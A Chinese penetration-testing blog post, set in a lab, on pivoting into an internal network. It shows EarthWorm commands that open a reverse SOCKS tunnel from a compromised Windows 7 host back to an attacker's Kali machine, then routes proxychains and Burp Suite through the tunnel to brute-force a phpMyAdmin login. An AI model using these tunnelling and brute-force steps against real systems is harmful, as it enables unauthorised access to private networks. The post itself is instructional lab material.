User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   内网渗透   ›   正文
内网渗透

内网穿透抓包

2020-11-24 21:54:23
818  0 1

提出问题: 通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?

一、实验环境

二、实验工具

Earthworm:下载地址:http://rootkiter.com/EarthWorm/

 

三、操作步骤

首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。

知识点:

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。
反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。

一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。

EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。

Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880

该命令是将本地1080端口的流量走向本地8880端口

Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880

该命令是将Win7靶机的流量流向Kali(172.17.60.226)的8880端口,但是流量之间的信息是需要通过端口进行交互的,Win7上虽然没有开放端口,但也会有一个大端口与Kali的8880端口进行双向交互。

EW连接上后再修改Proxychains的配置文件(vi /etc/proxychains.conf)将dynamic_chain前的注释去掉,并在最后写上socks5 127.0.0.1 1080

这样所有使用proxychains代理链开启的工具流量都会从本地的1080走向Win7的某大端口,从而将流量成功带入到内网环境,再通过proxychains firefox开启火狐访问内网win7的web端口发现存在phpmyadmin。

实验以phpmyadmin的密码爆破抓包为例,实战以任意web页面都可。首先不使用proxychains开启火狐,正常开启,正常配置bp端口进行抓包即可。

然后修改BurpSuite的User option选项将SOCKS Proxy中的代理修改为127.0.0.1 1080(与Proxychains中的配置相同)再进行抓包就可以对内网的web页面密码进行爆破了

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • SUCTF 2019 Guess_game
  • Python pickle反序列化
  • [安洵杯 2019]easy_serialize_php
  • Session反序列化
  • 原生类序列化
近期评论
    文章归档
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 项目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    157 文章 0 评论 21219 浏览
    测试
    测试